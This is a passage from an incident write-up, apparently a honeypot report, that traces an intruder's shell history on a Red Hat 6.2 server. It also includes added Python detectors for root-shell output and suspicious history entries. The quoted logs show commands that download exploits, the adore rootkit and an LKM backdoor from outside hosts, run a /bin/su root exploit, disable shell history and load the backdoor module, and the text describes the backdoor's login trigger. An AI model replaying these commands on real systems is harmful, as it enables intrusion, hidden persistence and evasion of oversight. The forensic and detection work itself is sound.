4. Second local privilege-escalation attempt
He switched to a different local privilege-escalation program, compiled it, and then deleted it right away?
2004-9-21 17:05 -bash: HISTORY: PID=1322 UID=500 cd ~tom
2004-9-21 17:05 -bash: HISTORY: PID=1322 UID=500 cat > su.c
2004-9-21 17:05 -bash: HISTORY: PID=1322 UID=500 gcc -o su su.c
2004-9-21 17:05 -bash: HISTORY: PID=1322 UID=500 ls
2004-9-21 17:06 -bash: HISTORY: PID=1322 UID=500 rm -rf su.c
It turned out the compile had failed. Some characters in the source code were mangled when he pasted it in through a cat redirection:
[tom@abc tom]$ ggcccc - -oo ssuu susu..cc
su.c:101: unterminated character constant
Sinbad Technical Publications Page 5
He tried another way: open a new file in vi and paste into it:
2004-9-21 17:06 -bash: HISTORY: PID=1322 UID=500 vi su.c
2004-9-21 17:07 -bash: HISTORY: PID=1322 UID=500 gcc -o su su.c
This time it went even worse, with three errors. We also notice that the recorded input contains a great many [A and [D characters: these are the arrow keys being used to scroll back through the history for the command "gcc -o su su.c" he had just typed. He is lazy enough.
[tom@abc tom]$ [Avi su.c[A[D[D[D[D[D[D[D[4@rm -rf su.c[A[D[D[D[D[D[D[D[D[D[D[Dls[K[A[D[Dgcc -o su su.c
su.c:107: unterminated character constant
su.c:523: unterminated string or character constant
su.c:130: possible real start of unterminated constant
He left another note, "I'll get back to this when I have time," and left. It was past five on a weekend afternoon; presumably he had something going on:
2004-9-21 17:09 -bash: HISTORY: PID=1322 UID=500 ls
2004-9-21 17:10 -bash: HISTORY: PID=1322 UID=500 rm -rf *.c
2004-9-21 17:10 -bash: HISTORY: PID=1322 UID=500 echo kao,yihou you kong zai gao >> haha.txt
2004-9-21 17:11 -bash: HISTORY: PID=1322 UID=500 w
2004-9-21 17:11 -bash: HISTORY: PID=1322 UID=500 ls -al
2004-9-21 17:11 -bash: HISTORY: PID=1322 UID=500 cat .bash_history
2004-9-21 17:13 -bash: HISTORY: PID=1322 UID=500 cat /etc/passwd
2004-9-21 17:16 -bash: HISTORY: PID=1322 UID=500 exit
5. Third local privilege-escalation attempt
Two days later, my friend came back. It was a Monday afternoon, during working hours, so evidently his job did not keep him very busy. This is the common trait of the "machine-hacking" crowd: plenty of time and energy.
2004-9-23 13:28 in.telnetd[5567]: connect from 210.X.X.X
2004-9-23 13:28 PAM_pwdb[5568]: (login) session opened for user tom by(uid=0)
2004-9-23 13:28 login: LOGIN ON 1 BY tom FROM 210.X.X.X
This time he had learned his lesson and tried to download directly from the net with wget, but my system apparently did not have wget installed, or its PATH was wrong. He ended up using lynx with the -dump option to fetch su.c, a privilege-escalation program exploiting /bin/su, from a domestic mirror of hack.co.za. He compiled it, ran it, and finally obtained local root:
2004-9-23 13:29 -bash: HISTORY: PID=5569 UID=500 w
2004-9-23 13:29 -bash: HISTORY: PID=5569 UID=500 ps -ef
2004-9-23 13:32 -bash: HISTORY: PID=5569 UID=500 wget http://www.safechina.net/www_hack_co_za/redhat/5.1/su.c
2004-9-23 13:34 -bash: HISTORY: PID=5569 UID=500 lynx
2004-9-23 13:35 -bash: HISTORY: PID=5569 UID=500 lynx -dump http://www.safechina.net/www_hack_co_za/redhat/5.1/su.c > su.c
2004-9-23 13:35 -bash: HISTORY: PID=5569 UID=500 gcc -o su su.c
2004-9-23 13:35 -bash: HISTORY: PID=5569 UID=500 ./su
su exploit by XP
Enjoy!
Phase 1. Checking paths and write permisions
Checking for /usr/bin/msgfmt...Ok
Checking for /usr/bin/objdump...Ok
Checking write permisions on /tmp...Ok
Checking read permisions on /bin/su...Ok
Checking for a valid language... [using af_ZA] Ok
Checking that /tmp/LC_MESSAGES does not exist...Ok
Phase 2. Calculating eat and pad values
......................................................................done
eat = 120 and pad = 2
Phase 3. Creating evil libc.mo and setting enviroment vars
Phase 4. Getting address of .dtors section of /bin/su
..........................................done
.dtors is at 0x0804bd3c
Phase 5. Compiling suid shell
/tmp/xp created Ok
Phase 6. Executing /bin/su
- Entering rootshell ;-) -
sh-2.03# iid
Snort also raised an alert indicating that he had obtained root:
2004-9-23 13:37 snort[1852]: [1:498:3] ATTACK RESPONSES id check returned root [Classification:
Potentially Bad Traffic] [Priority: 2]: {TCP} 10.0.0.1:23 -> 210.x.x.x:4560
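The alert above comes from the stock Snort "ATTACK RESPONSES id check returned root" rule, which looks for the output of a root shell's id command in the server-to-client direction. The following Python is an added example (not part of the original write-up and not Snort's own code) of the same check written as a small flow-aware matcher: it only inspects segments sent from the service port and keeps a short tail of the previous segment per flow, so a banner that happens to be split across two TCP segments is still caught. The packets, addresses and the RootShellDetector class are constructed for the example.

```python
import re

# Pattern the classic sid 498 rule looks for: the `id` output of a root shell.
ID_ROOT = re.compile(rb"uid=0\(root\)")


class RootShellDetector:
    """Match the root `id` banner in the server->client direction of each TCP flow.

    A tail of the previous segment is kept per flow so a banner split across two
    segments is still matched; a single-packet check would miss it.
    """

    def __init__(self, server_ports=(23,)):
        self.server_ports = set(server_ports)
        self.tail = {}        # flow key -> trailing bytes of the previous segment
        self.alerts = []

    def feed(self, src, sport, dst, dport, payload):
        if sport not in self.server_ports:    # only responses from the service
            return
        key = (src, sport, dst, dport)
        data = self.tail.get(key, b"") + payload
        if ID_ROOT.search(data):
            self.alerts.append(
                "[1:498:3] ATTACK RESPONSES id check returned root "
                "[Classification: Potentially Bad Traffic] [Priority: 2]: "
                f"{{TCP}} {src}:{sport} -> {dst}:{dport}")
            data = b""                          # do not re-alert on the same banner
        keep = len(b"uid=0(root)") - 1          # longest prefix a split could leave behind
        self.tail[key] = data[-keep:]


# Constructed telnet session: client keystrokes, an unprivileged `id`, then a
# root `id` whose output is split across two server segments.
PACKETS = [
    ("203.0.113.9", 4560, "10.0.0.1", 23, b"id\r\n"),
    ("10.0.0.1", 23, "203.0.113.9", 4560, b"uid=500(tom) gid=500(tom)\r\n"),
    ("10.0.0.1", 23, "203.0.113.9", 4560, b"sh-2.03# id\r\nuid=0("),
    ("10.0.0.1", 23, "203.0.113.9", 4560, b"root) gid=0(root)\r\n"),
]


def run(packets):
    """Feed packets through the detector and return the alerts raised."""
    det = RootShellDetector()
    for pkt in packets:
        det.feed(*pkt)
    return det.alerts


if __name__ == "__main__":
    for line in run(PACKETS):
        print(line)
```

Only one alert is raised for the constructed session: the unprivileged id output does not match, and the split root banner is matched once the second segment arrives.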
6. Installing backdoors
Having obtained the highest privileges, my friend started downloading the adore rootkit and a backdoor program called sunxkdoor:
2004-9-23 13:39 sh: HISTORY: PID=7046 UID=0 lynx -dump http://stealth.7350.org/rootkits/adore-0.52.tgz > 1.tgz
2004-9-23 13:47 sh: HISTORY: PID=7046 UID=0 lynx -dump http://www.sunx.org/mysoft/sunxkdoor.tar > 1.tar
But this failed again: the redirected files were all 0 bytes, because lynx does not work properly in the shell obtained through the privilege escalation:
sh-2.03# lynx -dump http://stealth.7350.org/rootkits/adore-0.52.tgz >> 1.tgz
Your terminal lacks the ability to clear the screen or position the cursor.
sh-2.03# llyynnxx --dduummpp http:h//www.sunx.org/mysoft/sunxkdoor.tarttp://www.sunx.org/mysoft/sunxkdoor.tar >> 11..ttarar
Your terminal lacks the ability to clear the screen or position the cursor.
sh-2.03# lls s-a l
-al
total 4
drwxr-xr-x 2 tom tom 1024 Sep 22 21:43 .
drwxrwxrwt 5 root root 1024 Sep 22 21:35 ..
-rw-rw-r-- 1 root root 0 Sep 22 21:43 1.tar
-rw-rw-r-- 1 root root 0 Sep 22 21:37 1.tgz
-rw-rw-r-- 1 root root 0 Sep 22 21:37 adore.tgz
-rwxrwxrwx 1 tom tom 458 Sep 22 21:35 libc.mo
-rw-rw-r-- 1 tom tom 428 Sep 22 21:35 libc.po
sh-2.03# rrm m --rrff **
After several failures he exited the root shell back to the normal terminal and successfully used lynx to download, one by one, telnetd.c, an exploit against the telnet daemon, saved as 1.c; the adore rootkit, saved as 1.tgz; and the sunxkdoor backdoor, saved as 2.tar:
sh-2.03# eexxiitt
exit
Phase 7. Cleaning enviroment
rm: cannot unlink `/tmp/xp': Operation not permitted
2004-9-23 14:03 -bash: HISTORY: PID=5569 UID=500 lynx -dump http://www.linux-secure.net/pliki/exploits/telnetd/telnetd.c > 1.c
2004-9-23 14:04 -bash: HISTORY: PID=5569 UID=500 lynx -dump http://stealth.7350.org/rootkits/adore-0.52.tgz> 1.tgz
2004-9-23 14:04 -bash: HISTORY: PID=5569 UID=500 ls -al
2004-9-23 14:05 -bash: HISTORY: PID=5569 UID=500 tar zxfv 1.tgz
2004-9-23 14:05 -bash: HISTORY: PID=5569 UID=500 cd adore
2004-9-23 14:05 -bash: HISTORY: PID=5569 UID=500 ls
2004-9-23 14:05 -bash: HISTORY: PID=5569 UID=500 ./configure
2004-9-23 14:05 -bash: HISTORY: PID=5569 UID=500 make
2004-9-23 14:06 -bash: HISTORY: PID=5569 UID=500 ls
2004-9-23 14:07 -bash: HISTORY: PID=5569 UID=500 cd ..
2004-9-23 14:08 -bash: HISTORY: PID=5569 UID=500 lynx -dump http://www.sunx.org/mysoft/sunxkdoor.tar > 2.tar
2004-9-23 14:08 -bash: HISTORY: PID=5569 UID=500 ls -al
2004-9-23 14:08 -bash: HISTORY: PID=5569 UID=500 export HISTFILE=/dev/null
Next he set about installing sunxkdoor, an LKM backdoor. That requires root, so he ran the su exploit again to get a root shell, loaded sunxkdoor with insmod, and then logged out of the system and came back in through this backdoor, bypassing the login process.
The backdoor appears to intercept calls to the original /bin/login: first telnet to the system and type the key string sunxkdoor at the login: prompt, and the system drops the connection automatically; telnet again, and you get a root # prompt directly.
Note that he moved all three downloaded backdoor programs into a newly created TOM directory under tom's home directory.
2004-9-23 14:08 -bash: HISTORY: PID=5569 UID=500 ./su
2004-9-23 14:10 sh: HISTORY: PID=8570 UID=0 pwd
2004-9-23 14:10 sh: HISTORY: PID=8570 UID=0 cd ~tom
2004-9-23 14:10 sh: HISTORY: PID=8570 UID=0 ls
2004-9-23 14:10 sh: HISTORY: PID=8570 UID=0 tar xfv 2.tar
2004-9-23 14:10 sh: HISTORY: PID=8570 UID=0 export HISTFILE=/dev/null
2004-9-23 14:12 sh: HISTORY: PID=8570 UID=0 cd sunxkdoor
2004-9-23 14:12 sh: HISTORY: PID=8570 UID=0 ls
2004-9-23 14:13 sh: HISTORY: PID=8570 UID=0 gcc -O2 -c sunxknlsh_linux_II.c
2004-9-23 14:13 sh: HISTORY: PID=8570 UID=0 ls
2004-9-23 14:14 sh: HISTORY: PID=8570 UID=0 mv sunxknlsh_linux_II.o ../sun.o
2004-9-23 14:14 sh: HISTORY: PID=8570 UID=0 cd ..
2004-9-23 14:14 sh: HISTORY: PID=8570 UID=0 ls
2004-9-23 14:14 sh: HISTORY: PID=8570 UID=0 w
2004-9-23 14:14 sh: HISTORY: PID=8570 UID=0 rm -rf sunxkdoor
2004-9-23 14:15 sh: HISTORY: PID=8570 UID=0 ls
2004-9-23 14:15 sh: HISTORY: PID=8570 UID=0 mkdir TOM
2004-9-23 14:15 sh: HISTORY: PID=8570 UID=0 mv * TOM
2004-9-23 14:15 sh: HISTORY: PID=8570 UID=0 ls
2004-9-23 14:15 sh: HISTORY: PID=8570 UID=0 cd TOM
2004-9-23 14:15 sh: HISTORY: PID=8570 UID=0 ls
2004-9-23 14:16 sh: HISTORY: PID=8570 UID=0 insmod
2004-9-23 14:16 sh: HISTORY: PID=8570 UID=0 whereis insmod
2004-9-23 14:17 sh: HISTORY: PID=8570 UID=0 /sbin/insmod sun.o
2004-9-23 14:17 sh: HISTORY: PID=8570 UID=0 /sbin/lsmod
2004-9-23 14:17 sh: HISTORY: PID=8570 UID=0 exit
2004-9-23 14:17 -bash: HISTORY: PID=5569 UID=500 exit
2004-9-23 14:17 PAM_pwdb[5568]: (login) session closed for user tom
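The HISTORY entries quoted throughout this write-up come from a shell patched to syslog every command with its PID and UID, which is what makes this timeline possible. As an added example (not part of the original write-up), the following Python parses such lines, groups them by shell PID, and flags the patterns this incident showed: a UID 0 shell appearing right after an unprivileged session, a binary run immediately after being compiled with gcc, the source being removed afterwards, HISTFILE pointed at /dev/null, and root loading a kernel module. The sample lines are constructed to match the page's format; the indicator names and the URL in the sample are my own.

```python
import re
from collections import OrderedDict

# Constructed sample, shaped like the "HISTORY" syslog entries quoted in the
# write-up (bash/sh patched to log every command with PID and UID).
SAMPLE_LOG = """\
2004-9-21 17:05 -bash: HISTORY: PID=1322 UID=500 cat > su.c
2004-9-21 17:05 -bash: HISTORY: PID=1322 UID=500 gcc -o su su.c
2004-9-21 17:06 -bash: HISTORY: PID=1322 UID=500 rm -rf su.c
2004-9-23 13:35 -bash: HISTORY: PID=5569 UID=500 gcc -o su su.c
2004-9-23 13:35 -bash: HISTORY: PID=5569 UID=500 ./su
2004-9-23 13:39 sh: HISTORY: PID=7046 UID=0 lynx -dump http://example.invalid/1.tgz > 1.tgz
2004-9-23 14:08 -bash: HISTORY: PID=5569 UID=500 export HISTFILE=/dev/null
2004-9-23 14:08 -bash: HISTORY: PID=5569 UID=500 ./su
2004-9-23 14:10 sh: HISTORY: PID=8570 UID=0 export HISTFILE=/dev/null
2004-9-23 14:17 sh: HISTORY: PID=8570 UID=0 /sbin/insmod sun.o
2004-9-23 14:17 sh: HISTORY: PID=8570 UID=0 exit
"""

LINE_RE = re.compile(
    r"^(?P<date>\S+) (?P<time>\d\d:\d\d) (?P<shell>\S+?):\s*HISTORY: "
    r"PID=(?P<pid>\d+) UID=(?P<uid>\d+) (?P<cmd>.*)$"
)


def parse_history(text):
    """Parse HISTORY syslog lines into dicts; lines that do not match are skipped."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            rec = m.groupdict()
            rec["pid"] = int(rec["pid"])
            rec["uid"] = int(rec["uid"])
            records.append(rec)
    return records


def sessions(records):
    """Group commands by shell PID: pid -> (uid, first time, last time, command count)."""
    out = OrderedDict()
    for r in records:
        stamp = f'{r["date"]} {r["time"]}'
        uid, first, _, n = out.get(r["pid"], (r["uid"], stamp, stamp, 0))
        out[r["pid"]] = (uid, first, stamp, n + 1)
    return out


def find_indicators(records):
    """Return (index, tag) pairs for the behaviours this incident showed."""
    hits = []
    compiled = set()      # output names passed to gcc -o so far
    last_uid = None
    for i, r in enumerate(records):
        cmd = r["cmd"]
        argv = cmd.split()
        prog = argv[0] if argv else ""
        # A shell logging as UID 0 right after a non-root session: local privilege escalation.
        if r["uid"] == 0 and last_uid not in (None, 0):
            hits.append((i, "root-shell-after-unprivileged-session"))
        last_uid = r["uid"]
        # gcc -o NAME ... followed by ./NAME: compile-and-run of a freshly fetched program.
        if prog == "gcc" and "-o" in argv and argv.index("-o") + 1 < len(argv):
            compiled.add(argv[argv.index("-o") + 1])
        elif prog.startswith("./") and prog[2:] in compiled:
            hits.append((i, "run-freshly-compiled-binary"))
        # rm of .c files once something has been compiled: the source being tidied away.
        if prog == "rm" and compiled and any(a.endswith(".c") for a in argv[1:]):
            hits.append((i, "source-cleanup"))
        # HISTFILE pointed at /dev/null: the shell's own history file is being disabled.
        if "HISTFILE=/dev/null" in cmd:
            hits.append((i, "anti-forensics-histfile"))
        # Root loading a kernel module (the LKM backdoor step in this incident).
        if r["uid"] == 0 and prog.endswith("insmod") and len(argv) > 1:
            hits.append((i, "kernel-module-load"))
    return hits


if __name__ == "__main__":
    recs = parse_history(SAMPLE_LOG)
    for idx, tag in find_indicators(recs):
        r = recs[idx]
        print(f'{r["date"]} {r["time"]} PID={r["pid"]} UID={r["uid"]} {tag}: {r["cmd"]}')
```

The UID transition check relies on the syslog ordering alone, which is enough here because the patched shell logs synchronously; on a busier box you would key it on the parent/child PID relationship instead. Note also that the attacker's export HISTFILE=/dev/null only disables the shell's on-disk history; the syslog copy that this script reads is unaffected, which is exactly why that logging was worth having.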
#'!
Red Hat Linux release 6.2 (Zoot)
Kernel 2.2.14-5.0 on an i686
login: ssuunnxkxkddooroor
#'!
Red Hat Linux release 6.2 (Zoot)
Kernel 2.2.14-5.0 on an i686
[root@abc /]# ccd d ~~ttomom
[root@abc tom]# llss